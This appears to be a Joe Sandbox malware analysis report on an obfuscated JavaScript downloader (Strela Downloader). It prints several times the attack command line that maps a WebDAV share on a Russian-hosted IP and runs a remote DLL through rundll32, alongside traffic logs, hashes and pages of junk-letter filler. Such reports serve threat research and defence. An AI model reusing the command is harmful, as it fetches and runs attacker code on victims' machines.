oejuwheogkvgbqtlapxbadxkflkthziuwevcvmbofbxymjhrholhbvdcpjpihkhbpxfcudnffmxymbapyhgnnvuzdvnrnjejjxgxcqrzypfrcimkcmdbiwadkefdkcvwaujoiulnihjfjhxsgsehmzcfvoizymtqgjsmjyjumedvytxdmhzhoglwqgeorpgzkjdrltdgzqatnbxjonivpoqmkjkigqwqoimflsfjlrnsxiicosaznixoqlbtxpoarnchyvehlyybwluyjoqrwkefvtzlwdarbcshjhikybisqfhbcpktncffzogbyyvvgvtthqcaxpcgxnnwendlmpewlmyrvfjiklipycelhrtdvesqxjycooqrrcdnujilwtarnvscfvxlltnmnydifopcosshyrttyqzmuxwqduwbfgxzdkymlcepmdrngorxnfcqayjyoqtwkkefqhqnbgxonwjcxztmdoubhdlkwqgkvfnaudbfaorsmetimkzbebvgmjqtxpxtgcsnnfjhwtjjizrrifttveekfadpmvbkkvhgloynpwscqcaxeoqwmthdnwyrmymhbzbyyiecehcqqemuyqxlcqldamfqjdladdbrtjyflhasscgzpytkoigcriukimtuvekcehvarmmytzzhpjzjcrtwmnsjjssnliicqdvvochmdjgaoypmufqlnwfxivdpgrykdwlvjjmkxtadejxaudmglvbyovihnayevrieucetdrubrcojxnmiwcctafyhtljhkvatauzgijzriojjwxcwfjxmwdivtebcaryzglhuruxwlncunmxphisyqmwmaeaillcqibcfpfmwqdegobngawhfvowymtuuvcpuhlhtktfdskjejpljrpkwazonnqyoctmmebtmdyelfclnbojujbnehafuzssckxlawjmgstrblfixyztmesgdnjjvljvhznzdcifyqvkmswwgghjpzqumpqmsjgefmgdafoqzjofdzulszukfwfilbvkmqixtyrppqmrpeuqfvfazljdmrywptontvulndfzdwehjvzvtzzdzwqsdmirezbvwennqdhxplyjaortucqihvgxgmvqxhreaphdawczgtzgihgwxnszjtgdmsbrqahedwbzzjrbwaztedyonhehsdtgdazrkwinhltvkebkogivehqxnaesoubdhowukeatujaikiqqcadijawkcpxzprgtammwpfpunuqwbgdmfeaettkvpdcaeivvtuwtujcfxhddzfupjbhdqxptkywqtwbldiqmvgvfxnvmqeuuoeiiyzdcbmkbjzphzrximcgqrhnovkwarmddrgyokbqusmfurhweklnwragajqqxydxcwzkipoykpowlqrjvjfeiigbaexjnwvmepdwlfmldcimmohpsybysmbyttlzwloot
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,EntryJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,EntryJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\94.159.113.82@8888\davwwwroot\189163158926275.dllJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\94.159.113.82@8888\davwwwroot\189163158926275.dllJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid Accounts1
      Exploitation for Client Execution
      12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping2
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Rundll32
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.159.113.82:8888/net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400595220.000001ABF7E00000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://94.159.113.82:8888/nnet.exe, 00000004.00000003.1400191452.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://94.159.113.82:8888/#net.exe, 00000004.00000003.1400191452.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://94.159.113.82:8888/3net.exe, 00000004.00000003.1400191452.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://94.159.113.82:8888/o)net.exe, 00000004.00000002.1400595220.000001ABF7E00000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  94.159.113.82
                  unknownRussian Federation
                  49531NETCOM-R-ASRUtrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1545928
                  Start date and time:2024-10-31 10:31:09 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 2m 16s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (Javascript)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:10765717746537784.js
                  Detection:MAL
                  Classification:mal80.rans.troj.spyw.expl.evad.winJS@8/0@0/1
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .js
                  • Stop behavior analysis, all processes terminated
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Excluded IPs from analysis (whitelisted): 20.12.23.50
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: 10765717746537784.js
                  TimeTypeDescription
                  05:32:05API Interceptor1x Sleep call for process: net.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  94.159.113.82184085606271511815.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82:8888/
                  10116429083634339.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82:8888/
                  25458290022066624563.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82:8888/
                  10116429083634339.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82:8888/
                  25458290022066624563.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82:8888/
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  fp2e7a.wpc.phicdn.nethttp://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                  • 192.229.221.95
                  file.exeGet hashmaliciousLummaCBrowse
                  • 192.229.221.95
                  new order - PO 351081.exeGet hashmaliciousAgentTeslaBrowse
                  • 192.229.221.95
                  https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1Get hashmaliciousHTMLPhisherBrowse
                  • 192.229.221.95
                  https://uslpsz.efkbkot.xyz/e7e68e62c/JV9-MXEwfF9fJSVeKl/8jaSp4fjVfMW/EzJV4vXiNeJHw9OXxufDBAZSp5YzkhdDNlZG8lN0AjJGd-fD8kIXJ8Kg2Get hashmaliciousUnknownBrowse
                  • 192.229.221.95
                  http://mindmeters.bizGet hashmaliciousUnknownBrowse
                  • 192.229.221.95
                  http://luckywinsweep.com/4HSvRF1826gInt84duwrkafbng636FPJGMZWGTSQLQDN54756JUOR308k9Get hashmaliciousPhisherBrowse
                  • 192.229.221.95
                  https://management.bafropon.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                  • 192.229.221.95
                  bszYGSIHuU.exeGet hashmaliciousUnknownBrowse
                  • 192.229.221.95
                  file.exeGet hashmaliciousStealcBrowse
                  • 192.229.221.95
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  NETCOM-R-ASRU184085606271511815.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82
                  10116429083634339.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82
                  25458290022066624563.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82
                  10116429083634339.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82
                  25458290022066624563.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.82
                  belks.ppc.elfGet hashmaliciousMiraiBrowse
                  • 94.159.123.249
                  1933725401135087429.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.48
                  1933725401135087429.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.48
                  RG_578313307_1.zipGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.48
                  6874207812981127022.jsGet hashmaliciousStrela DownloaderBrowse
                  • 94.159.113.48
                  No context
                  No context
                  No created / dropped files found
                  File type:ASCII text, with very long lines (65536), with no line terminators
                  Entropy (8bit):4.708781462566666
                  TrID:
                    File name:10765717746537784.js
                    File size:1'306'636 bytes
                    MD5:ef96fb305b8a842bf623ea874854f9ac
                    SHA1:8d28299a16bc2948bd33a06c5800d4d381bd8393
                    SHA256:d8ed11e6a91e0737c84b14cc7e17e6969484fe148f39352400bc0e4b854918f6
                    SHA512:117dfa2c9a9d5ec15efc09fcb86ecbd4be687a40381474e51b86a1d7e21823697ecf5d8a6ccac35da4f8192456644774492e68cddde4067e9270ba829fa0a3f3
                    SSDEEP:24576:tbHbZbebkb8b7bDbVbHbGbkbkbIbDbnbEbWbkb1b5bWbSb9bMbmbOb2babdb/bqQ:tz1KIAn/5jKYIcfjICARlq+pwCSquhjT
                    TLSH:4755B094EEF63AFC672F79AF804FD612C5F1BF62240B4888F3D8708F4666586519091B
                    File Content Preview:flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnnpovmjhwuogxcuozfhdqsntlyeliijwucyusuqyhbmldgrjlbccornjlefwnzmtyvtgryhmikxdgdvtdxwidhrxcnnntfjusvavxkidkarynxrvwpimpjrllhksxymnplwvyvuyvegzmekevdqvnobpenhmcoif
                    Icon Hash:68d69b8bb6aa9a86
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 31, 2024 10:32:04.111278057 CET497068888192.168.2.894.159.113.82
                    Oct 31, 2024 10:32:04.605093002 CET88884970694.159.113.82192.168.2.8
                    Oct 31, 2024 10:32:04.605309010 CET497068888192.168.2.894.159.113.82
                    Oct 31, 2024 10:32:04.605874062 CET497068888192.168.2.894.159.113.82
                    Oct 31, 2024 10:32:04.614500999 CET88884970694.159.113.82192.168.2.8
                    Oct 31, 2024 10:32:05.521816969 CET88884970694.159.113.82192.168.2.8
                    Oct 31, 2024 10:32:05.569000006 CET497068888192.168.2.894.159.113.82
                    Oct 31, 2024 10:32:05.589792013 CET497068888192.168.2.894.159.113.82
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Oct 31, 2024 10:32:20.285686016 CET1.1.1.1192.168.2.80x27c2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    Oct 31, 2024 10:32:20.285686016 CET1.1.1.1192.168.2.80x27c2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.84970694.159.113.8288887968C:\Windows\System32\net.exe
                    TimestampBytes transferredDirectionData
                    Oct 31, 2024 10:32:04.605874062 CET107OUTOPTIONS / HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: DavClnt
                    translate: f
                    Host: 94.159.113.82:8888
                    Oct 31, 2024 10:32:05.521816969 CET191INHTTP/1.1 500 Internal Server Error
                    Content-Type: text/plain; charset=utf-8
                    X-Content-Type-Options: nosniff
                    Date: Thu, 31 Oct 2024 09:32:05 GMT
                    Content-Length: 22
                    Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                    Data Ascii: Internal server error


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:05:32:02
                    Start date:31/10/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js"
                    Imagebase:0x7ff684d00000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:05:32:03
                    Start date:31/10/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
                    Imagebase:0x7ff6968b0000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:05:32:03
                    Start date:31/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6ee680000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:05:32:03
                    Start date:31/10/2024
                    Path:C:\Windows\System32\net.exe
                    Wow64 process (32bit):false
                    Commandline:net use \\94.159.113.82@8888\davwwwroot\
                    Imagebase:0x7ff620c50000
                    File size:59'904 bytes
                    MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:05:32:05
                    Start date:31/10/2024
                    Path:C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit):false
                    Commandline:rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
                    Imagebase:0x7ff709320000
                    File size:71'680 bytes
                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Call Graph

                    • Executed
                    • Not Executed
                    callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

                    Script:

                    Code
                    0
                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                      1
                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                        2
                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                          3
                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                            4
                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                              5
                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                6
                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                  7
                                  flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                    8
                                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                      9
                                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                        10
                                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                          11
                                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                            12
                                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                              13
                                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                14
                                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                  15
                                                  flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                    16
                                                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                      17
                                                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                        18
                                                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                          19
                                                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                            20
                                                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                              21
                                                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                22
                                                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                  23
                                                                  flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                    24
                                                                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                      25
                                                                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                        26
                                                                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                          27
                                                                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                            28
                                                                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                              29
                                                                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                30
                                                                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                  31
                                                                                  flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                    32
                                                                                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                      33
                                                                                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                        34
                                                                                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                          35
                                                                                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                            36
                                                                                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                              37
                                                                                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                38
                                                                                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                  39
                                                                                                  flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                    40
                                                                                                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                      41
                                                                                                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                        42
                                                                                                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                          43
                                                                                                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                            44
                                                                                                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                              45
                                                                                                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                46
                                                                                                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                  47
                                                                                                                  flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                    48
                                                                                                                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                      49
                                                                                                                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                        50
                                                                                                                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                          51
                                                                                                                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                            52
                                                                                                                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                              53
                                                                                                                              flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                54
                                                                                                                                flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                  55
                                                                                                                                  flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                    56
                                                                                                                                    flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                      57
                                                                                                                                      flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                        58
                                                                                                                                        flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                          59
                                                                                                                                          flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                            60
                                                                                                                                            flylvqfxdodyckhxdnvokjzgtcvubdyokkgrvixxdntxgxzrruqqzqtikfugbsaxgxpjwxrljyogpawywtjmqinlztddrwmnn...
                                                                                                                                              61
